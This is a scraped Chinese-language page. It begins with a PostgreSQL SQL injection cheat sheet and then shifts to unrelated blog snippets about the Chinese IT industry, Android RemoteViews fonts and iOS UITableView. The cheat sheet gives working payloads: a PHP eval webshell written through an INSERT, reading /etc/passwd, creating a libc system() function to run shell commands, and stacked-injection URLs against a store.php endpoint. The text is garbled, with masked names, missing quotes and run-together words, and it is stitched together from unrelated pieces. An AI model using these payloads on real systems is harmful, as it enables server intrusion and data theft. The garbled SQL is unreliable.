一不小心高潮了
如何獲得webshell
into **** values($$<?php eval($_post[cmd]);?>$$);
如何讀檔案
table myfile (input text);
myfile from 『/etc/passwd』;
* from myfile;
z執行命令有兩種方式,一種是需要自定義的lic函式支援,一種是用pl/python支援的。
當然,這些的postgresql的資料庫版本必須大於8.x
建立乙個system的函式:
create function system(cstring) returns int as /lib/libc.so.6, system language c strict
建立乙個輸出表:
create table stdout(id serial, system_out text)
執行shell,輸出到輸出表內:
select system(uname -a > /tmp/test)
copy 輸出的內容到表裡面;
copy stdout(system_out) from /tmp/test
從輸出表內讀取執行後的回顯,判斷是否執行成功
select system_out from stdout
下面是測試例子
/store.php?id=1; create table stdout(id serial, system_out text) --
/store.php?id=1; create function system(cstring) returns int as/lib/libc.so.6,system language c
strict --
/store.php?id=1; select system(uname -a > /tmp/test) --
/store.php?id=1; copy stdout(system_out) from /tmp/test --
/store.php?id=1 union all select null,(select stdout from system_outorder by id desc),null limit 1 offset 1--
一些人,一些事,一些
我覺得這是國內it企業浮躁和傳統的官本位性質決定的,導致國內企業都本末倒置。要想改變命運,我覺得有以下出路 1.不做技術了,改做混混 混混的概念很廣泛的,比如銷售 經理 幹部 皮包公司之類其實都屬於這類。中國就是這樣,越浮越掙錢,只有混混才能發財。要不更進一步,做流氓,廣義的流氓,也很不錯。2.專心...
關於RemoteView 的一些字型的一些問題
最近在做乙個 在notification 新增 天氣通知的小部分 發現困擾在 如何給 remoteview 中的字型 作修改 大家都知道 textview 設定字型 在xml 中 可以 設定 3種 而其他字型的設定 需要通過 typeface 去設定 具體 將字型放置在asset 資料夾中 type...
iPhone UITableVIew 的一些理解
uitableview 用的不少,其重用機制還是有點迷惑。之前有用過sdwebimage和 結合該demo,做個小總結 2 uitableview可以響應uiscrollview 的delegate,因為uitableview中就有乙個scrollview 得先宣告 inte ce rootview...